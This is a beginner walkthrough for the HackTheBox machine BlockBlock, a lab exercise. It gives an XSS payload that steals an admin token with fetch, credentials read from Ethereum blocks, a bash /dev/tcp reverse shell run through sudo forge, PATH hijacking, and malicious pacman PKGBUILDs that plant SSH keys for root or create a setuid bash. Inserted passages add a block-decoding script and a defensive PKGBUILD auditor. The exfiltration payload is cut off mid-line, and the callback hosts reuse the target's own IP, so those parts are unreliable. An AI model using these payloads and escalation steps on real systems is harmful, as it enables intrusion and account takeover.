Beginner’s Guide to Conquering BlockBlock on HackTheBox

The CyberSec Guru



Key Highlights

  • BlockBlock is a challenging cybersecurity training ground on HackTheBox, ideal for sharpening ethical hacking skills.
  • This guide provides a comprehensive walkthrough for beginners, covering everything from initial setup to obtaining root access.
  • Mastering BlockBlock equips you with practical knowledge of web application vulnerabilities, privilege escalation techniques, and penetration testing methodologies.
  • Successfully compromising this machine demonstrates your ability to think critically and apply your skills to real-world scenarios.
  • Throughout your journey, remember that perseverance and continuous learning are paramount in cybersecurity.

Introduction

In the ever-evolving landscape of cybersecurity, practical experience is paramount. HackTheBox provides a safe and legal environment for enthusiasts to hone their skills, and BlockBlock stands out as an excellent machine for beginners to test their mettle. This beginner’s guide aims to provide a clear roadmap for conquering BlockBlock, empowering you with the knowledge and confidence to tackle progressively challenging cybersecurity scenarios.

Understanding BlockBlock on HackTheBox

Before we dive into the trenches, it’s essential to understand the nature of BlockBlock and its significance for aspiring cybersecurity professionals. This section will explore BlockBlock’s unique challenges and explain why it’s a worthwhile endeavor for those starting their cybersecurity journey.

What is BlockBlock?

BlockBlock is a virtual machine hosted on the HackTheBox platform, designed to simulate a real-world computer system vulnerable to various cyberattacks. It presents a series of challenges that require you to leverage your knowledge of networking, web apps, operating systems, and cybersecurity principles to gain access to the system and ultimately achieve “root” access – the highest level of privilege.

Imagine BlockBlock as a locked house with multiple security flaws. Your goal is to act as an ethical hacker, exploiting those vulnerabilities to gain entry and eventually take complete control of the house. Each step in conquering BlockBlock mimics the stages of a real-world penetration testing engagement.

Why is it Important for Beginners to Tackle BlockBlock?

Tackling BlockBlock as a beginner offers several benefits. Firstly, it provides a hands-on, practical application of theoretical cybersecurity concepts. Instead of merely reading about vulnerabilities, you’ll actively exploit them, solidifying your understanding.

Secondly, BlockBlock helps develop critical thinking and problem-solving skills essential for a cybersecurity career. You’ll face roadblocks along the way, requiring you to think creatively and strategically to find solutions.

Lastly, successfully compromising BlockBlock instills a sense of accomplishment and boosts your confidence in tackling increasingly complex cybersecurity challenges. It proves that with dedication and perseverance, you can break into the exciting world of ethical hacking.

Preparing to Conquer BlockBlock

Now that we understand the significance of BlockBlock, let’s prepare for the challenge. Adequate preparation is crucial for success in any cybersecurity endeavor, and this section will guide you through setting up the necessary tools, resources, and mindset.

Essential Tools and Resources Needed

To embark on your BlockBlock conquest, you will need a few essential tools readily available online:

  • Virtual Machine Software: VirtualBox or VMware Workstation Player (free for personal use).
  • Kali Linux Virtual Machine: A Debian-based Linux distribution specifically pre-configured with a vast array of penetration testing tools.
  • A HackTheBox Account: Sign up for a free account on the HackTheBox platform to access the BlockBlock machine.

These resources form the foundation of your ethical hacking toolkit and will be instrumental throughout your journey.

Setting Up Your Environment for Success

Begin by installing your chosen virtual machine software and then set up your Kali Linux virtual machine. Once Kali is up and running, ensure that it’s connected to the internet within your virtual machine settings.

Next, ensure that you can access HackTheBox machines from your Kali VM. This might involve configuring your network settings to connect through HackTheBox’s VPN or using their web-based access.

Finally, familiarize yourself with the basic Linux commands and the tools available within Kali Linux. A solid grasp of these fundamentals will be essential as we progress through the exploitation stages.


Gathering Initial Information

Before attempting any attacks, it’s crucial to gather as much information as possible about the target system. This process is known as reconnaissance. Begin by performing a port scan using a tool like Nmap to identify open ports and services running on BlockBlock.

Command: nmap -sV -sC -A
Description: Perform a comprehensive scan of the target (version detection, default scripts, OS detection)
Example: nmap -sV -sC -A 10.10.10.10

Analyze the Nmap output to pinpoint potential vulnerabilities. For example, an open SSH port might indicate an older version susceptible to known exploits. Additionally, explore the website, if available, to identify web application vulnerabilities.

NMap Output

[Image: Blockblock.htb Nmap scan]

Nmap Scan Result Interpretation

1. General Information
  • Target IP: 10.129.179.129
  • Host Status: The host is up, with a latency of 0.089 seconds.
  • Scan Details:
    • All 65535 TCP ports were scanned.
    • 65532 ports are closed (reset).
    • Three ports are open: 22 (SSH), 80 (HTTP), and 8545 (Unknown).

2. Open Ports
Port 22 (SSH)
  • Service: OpenSSH 9.7 (Protocol 2.0).
  • Host Key Fingerprints:
    • ECDSA: d6:31:91:f6:8b:95:11:2a:73:7f:ed:ae:a5:c1:45:73
    • ED25519: f2:ad:6e:f1:e3:89:38:98:75:31:49:7a:93:60:07:92
  • Interpretation:
    • The system is running an SSH server for secure shell access.
    • The version, OpenSSH 9.7, is relatively recent. This might reduce the likelihood of known vulnerabilities, but further testing is required to confirm.

Port 80 (HTTP)
  • Service: HTTP server running Werkzeug 3.0.3 on Python 3.12.3.
  • HTTP Response Highlights:
    • Server Header: Werkzeug/3.0.3 Python/3.12.3.
    • Allow Headers: Content-Type, Authorization.
    • Allow Methods: GET, POST, PUT, DELETE, OPTIONS.
    • Access-Control Policy:
      • Origin: http://0.0.0.0/ (default open origin, a potential security misconfiguration).
  • Pages and Errors:
    • /: The homepage titled “Home – DBLC” is available.
    • A 500 Internal Server Error was returned for HTTP OPTIONS, indicating a possible misconfiguration or backend error.
  • Interpretation:
    • The server is likely hosting a web application.
    • The tools (Werkzeug) and language (Python) are commonly used for development and debugging environments, suggesting this might not be a production server.
    • The error messages and open methods (e.g., PUT) could provide opportunities for further exploration, such as:
      • Testing for vulnerabilities like directory traversal or unauthorized file uploads.
      • Analyzing the /assets/nav-bar.css file for potential information leakage.

Port 8545 (Unknown)
  • Service: Likely a custom or lesser-known application using HTTP, as suggested by the following:
    • Bad Request: Returns HTTP 400 for invalid syntax.
    • Methods Allowed: OPTIONS, GET, POST, HEAD.
    • Access-Control Policy: Open to all origins (*), which is a potential security concern.
    • Error Messages:
      • Misinterpreted HTTP syntax (e.g., “HELP”) and unsupported methods (e.g., RTSP/1.0).
  • Interpretation:
    • The port is running an HTTP service but does not conform to typical HTTP behavior.
    • Could be:
      • An Ethereum JSON-RPC endpoint, as 8545 is the default port for Ethereum clients (confirm by testing JSON-RPC payloads like eth_blockNumber).
      • A custom web or API server.

3. Observations and Next Steps
Host Security Observations
  1. SSH: Likely secured with modern cryptographic algorithms. Test for weak authentication methods (e.g., brute force).
  2. HTTP (Port 80):
    • The inclusion of PUT in the allowed methods is unusual and should be tested for file upload vulnerabilities.
    • Error pages might reveal sensitive information about the server or application configuration.
    • The open origin policy (Access-Control-Allow-Origin: *) is a potential security concern.
  3. Unknown Service (Port 8545):
    • Check for specific service running on this port.
    • Test for known vulnerabilities in Ethereum JSON-RPC endpoints, if applicable.
    • Probe with common HTTP fuzzing techniques for valid endpoints or commands.

Web Application Analysis

After registering an account, we gain access to the chat functionality. The application has several key features:

  • A chat interface where users can send messages
  • A “Report User” function
  • Smart contracts viewable through an API endpoint

The application uses JWT tokens for authentication, stored in an HttpOnly cookie named token. The site makes periodic calls to /api/recent_messages to fetch chat messages and to port 8545 for blockchain-related operations.

Two Solidity smart contract files are available through the API:

  • Database.sol: Manages user accounts with functions for registration and password management
  • Chat.sol: Handles chat messages using the Database contract for authentication

Exploiting XSS to Gain Admin Access

The “Report User” functionality is vulnerable to cross-site scripting (XSS). When a user is reported, their message is rendered without proper sanitization to an admin user.

Testing with a simple HTML payload confirms the vulnerability:

<img src="http://10.129.179.129/img.png" />

This results in a request to our server, confirming the HTML injection. We can then leverage this to execute JavaScript:

<img src="x" onerror="fetch('http://10.129.179.129/xss')" />

Since the JWT token is HttpOnly, we can’t directly access it via JavaScript. However, we discovered an API endpoint /api/info that returns the current user’s token. We can exploit this to exfiltrate the admin’s token:

 resp.text()).then(body => { fetch('http://10.129.179.129/exfil', { method: 'POST', body: body});})" />

This successfully retrieves the admin’s token, which we can then use to access the admin panel at /admin.

Blockchain Exploitation

Interacting with the Ethereum RPC

The admin panel reveals additional functionality for interacting with the blockchain. The application makes calls to /api/chat_address to get a blockchain address, followed by calls to /api/json-rpc with the Ethereum JSON-RPC method eth_getBalance.

We can use the eth_getBlockByNumber method to retrieve raw blocks from the blockchain:

{"jsonrpc":"2.0","method":"eth_getBlockByNumber","params":["latest",true],"id":1}

Since there are only 16 blocks (0x0 to 0xf), we can systematically examine each one. In block 0x01, we find interesting data in the input field that decodes to reveal a username “keira” and a password “SomedayBitCoinWillCollapse”.
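The block walk described above (probe the RPC on 8545, pull each of the 16 blocks with eth_getBlockByNumber, decode the transaction calldata), as an added example that is not code from the post. It builds the JSON-RPC requests, decodes each transaction's input field and extracts the readable strings from it; the block response is constructed inline and the transport is a caller-supplied callable, so it runs offline. The lesson for defenders is the same one the box teaches: anything written to the chain in cleartext is readable by anyone who can reach the RPC port.

```python
import json

# Constructed sample eth_getBlockByNumber response (not captured from the box):
# one transaction whose calldata is a 4-byte function selector followed by
# ASCII text, the pattern the write-up describes for block 0x01.
SAMPLE_RESPONSE = json.dumps({
    "jsonrpc": "2.0", "id": 2,
    "result": {
        "number": "0x1",
        "transactions": [{
            "hash": "0x" + "ab" * 32,
            "from": "0x" + "11" * 20,
            "to": "0x" + "22" * 20,
            "input": "0x" + "deadbeef"
                     + "user=example\x00pass=example-secret".encode().hex(),
        }],
    },
})


def block_request(block_number: int, with_txs: bool = True) -> dict:
    """JSON-RPC request for one block; params[1]=True returns full transaction objects."""
    return {"jsonrpc": "2.0", "method": "eth_getBlockByNumber",
            "params": [hex(block_number), with_txs], "id": block_number + 1}


def printable_runs(data: bytes, min_len: int = 4) -> list[str]:
    """Runs of printable ASCII (0x20..0x7e) at least min_len long, like `strings`."""
    runs, current = [], []
    for b in data:
        if 0x20 <= b < 0x7F:
            current.append(chr(b))
        else:
            if len(current) >= min_len:
                runs.append("".join(current))
            current = []
    if len(current) >= min_len:
        runs.append("".join(current))
    return runs


def decode_block_inputs(response_text: str) -> list[dict]:
    """Split each transaction's calldata into selector + readable strings."""
    block = json.loads(response_text)["result"]
    findings = []
    for tx in block.get("transactions", []):
        raw = bytes.fromhex(tx["input"][2:])          # drop the 0x prefix
        findings.append({"block": int(block["number"], 16), "tx": tx["hash"],
                         "selector": raw[:4].hex(),   # first 4 bytes: function selector
                         "strings": printable_runs(raw[4:])})
    return findings


def scan_blocks(send, count: int = 16) -> list[dict]:
    """Walk blocks 0x0..count-1; `send` takes a request dict and returns the response text."""
    results = []
    for n in range(count):
        results.extend(decode_block_inputs(send(block_request(n))))
    return results
```

With a real endpoint, `send` would POST the request dict as JSON to http://<host>:8545/ and return the body; the stub form here lets the decoding logic be checked without a node.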

SSH Access as keira

Using the credentials discovered in the blockchain, we can establish an SSH connection as the user keira:

ssh keira@10.129.179.129

This gives us access to the user flag.

Privilege Escalation to paul

Examining Permissions

The system is running Arch Linux. There are two users with home directories: keira and paul. Checking sudo permissions reveals that keira can run the forge command as paul without a password:

sudo -l
User keira may run the following commands on blockblock:
(paul : paul) NOPASSWD: /home/paul/.foundry/bin/forge

Exploiting forge

forge is part of the Foundry toolkit for Ethereum application development. There are multiple ways to exploit this for privilege escalation:

Method 1: Using the build command with --use

The build command has a --use option that allows specifying a binary to use as the compiler. We can create a reverse shell script and execute it:

echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.129.179.129/443 0>&1' | tee shell.sh
chmod +x shell.sh
sudo -u paul /home/paul/.foundry/bin/forge build --use ./shell.sh

Method 2: Using the flatten command for file operations

The flatten command can read and write files. We can use this to write our SSH public key to paul’s authorized_keys file:

echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDIK/xSi58QvP1UqH+nBwpD1WQ7IaxiVdTpsg5U19G3d nobody@nothing" > pub
sudo -u paul /home/paul/.foundry/bin/forge flatten pub -o /home/paul/.ssh/authorized_keys

Method 3: Exploiting relative path execution

The forge command calls git using a relative path. We can create a malicious git script in the current directory and manipulate the PATH:

cp shell.sh git
sudo -u paul PATH=.:$PATH /home/paul/.foundry/bin/forge build

Privilege Escalation to root

Examining Permissions

The user paul can run pacman (the Arch Linux package manager) as any user without a password:

sudo -l
User paul may run the following commands on blockblock:
(ALL : ALL) NOPASSWD: /usr/bin/pacman

Exploiting pacman

There are multiple ways to exploit pacman for privilege escalation:

Method 1: File write in package()

We can create a custom package that writes our SSH public key to root’s authorized_keys file:

pkgname=tcsg
pkgver=1
pkgrel=1
pkgdesc="privesc"
url=https://thecybersecguru.com
source=("pub")
arch=("x86_64")
license=("GPL2")
build() {
  echo "privsec"
}
package() {
  install -Dm755 "$srcdir/pub" "$pkgdir//root/.ssh/authorized_keys"
}

After creating the package with makepkg --skipinteg, we can install it with:

sudo /usr/bin/pacman -U tcsg-1-1-x86_64.pkg.tar.zst

This gives us SSH access as root.

Alternatively, we could create a SetUID/SetGID copy of bash:

package() {
  install -Dm6777 -o root -g root "/bin/bash" "$pkgdir//var/tmp/0xdf"
}

Note that we use /var/tmp because /dev/shm and /tmp are mounted with nosuid.

Method 2: Using install scripts

Pacman packages can include install scripts that run during installation, which could be used to execute commands as root.

Method 3: Using --hookdir

The --hookdir option in pacman could potentially be exploited to run custom hooks during package installation.
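An added example (not code from the post) that looks at the pacman abuse above from the defensive side: a small PKGBUILD auditor that flags exactly the three things the methods rely on, package() steps that drop files into sensitive locations such as /root/.ssh, setuid/setgid install modes, and an install= script that will run as root. The PKGBUILD text is constructed inline and mirrors the package() bodies shown above; the install= line is an assumed name for illustration.

```python
import re
import shlex

# Constructed PKGBUILD (sample input, not the box's file) combining the two
# package() bodies from the write-up plus an assumed install script entry.
SAMPLE_PKGBUILD = """\
pkgname=tcsg
pkgver=1
pkgrel=1
arch=("x86_64")
source=("pub")
install=tcsg.install
package() {
  install -Dm755 "$srcdir/pub" "$pkgdir//root/.ssh/authorized_keys"
  install -Dm6777 -o root -g root "/bin/bash" "$pkgdir//var/tmp/0xdf"
}
"""

SENSITIVE_PREFIXES = ("/root/", "/etc/sudoers", "/etc/passwd", "/etc/shadow")
HOME_SSH = re.compile(r"^/home/[^/]+/\.ssh/")


def parse_install(tokens: list[str]) -> tuple:
    """Return (octal mode or None, destination) from a tokenised install(1) line."""
    mode = None
    for i, tok in enumerate(tokens):
        m = re.fullmatch(r"-[A-Za-z]*m([0-7]{3,4})", tok)  # e.g. -Dm755, -m6777
        if m:
            mode = int(m.group(1), 8)
        elif tok == "-m" and i + 1 < len(tokens):          # e.g. -m 755
            mode = int(tokens[i + 1], 8)
    return mode, tokens[-1]


def audit_pkgbuild(text: str) -> list[str]:
    """Flag install scripts, setuid/setgid modes and writes into sensitive paths."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if stripped.startswith("install="):
            script = stripped.split("=", 1)[1]
            findings.append(f"line {lineno}: install script {script} runs as root during pacman -U")
            continue
        if not stripped.startswith("install "):
            continue
        mode, dest = parse_install(shlex.split(stripped))
        # strip the $pkgdir prefix and collapse '//' so the target path is comparable
        path = re.sub(r"/+", "/", re.sub(r"^\$\{?pkgdir\}?", "", dest))
        if mode is not None and mode & 0o6000:
            findings.append(f"line {lineno}: setuid/setgid mode {mode:o} on {path}")
        if path.startswith(SENSITIVE_PREFIXES) or HOME_SSH.match(path):
            findings.append(f"line {lineno}: writes to sensitive path {path}")
    return findings
```

Run against a repository of locally built packages, or wired into a pre-install check, it gives a quick signal before `pacman -U` installs something that a NOPASSWD sudo rule then runs as root.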


Conclusion

In conclusion, conquering BlockBlock on HackTheBox is a rewarding challenge for beginners in cybersecurity. Understanding the fundamentals and having the right tools and resources are crucial for success. By setting up your environment strategically and gathering initial information, you can navigate through BlockBlock effectively. Remember, practice and patience are key in mastering this task. Embrace the learning process and enjoy the journey of enhancing your cybersecurity skills. For more expert tips and insights, don’t forget to subscribe for the latest updates and tutorials. Happy hacking!

Frequently Asked Questions

What are the prerequisites for attempting BlockBlock?

A basic understanding of networking, Linux command-line usage, and web app concepts is recommended. Familiarity with cybersecurity fundamentals will be beneficial, although not strictly mandatory, as this guide aims to guide beginners through the process. Preparation is key to overcoming BlockBlock’s challenges and solidifying your skills.

How long does it typically take to complete BlockBlock for a beginner?

The time to complete BlockBlock varies depending on your prior cybersecurity experience and problem-solving skills. Some beginners might take a few hours, while others could take a couple of days. The crucial aspect is to maintain a consistent learning pace and not get discouraged by roadblocks.

Are there any specific tools or techniques that are helpful for conquering BlockBlock on HackTheBox?

While this guide provides a solid foundation, specific tools and techniques for success might vary. Leverage online resources, cybersecurity forums, and communities like the HackTheBox Discord server for hints, tips, and different perspectives.
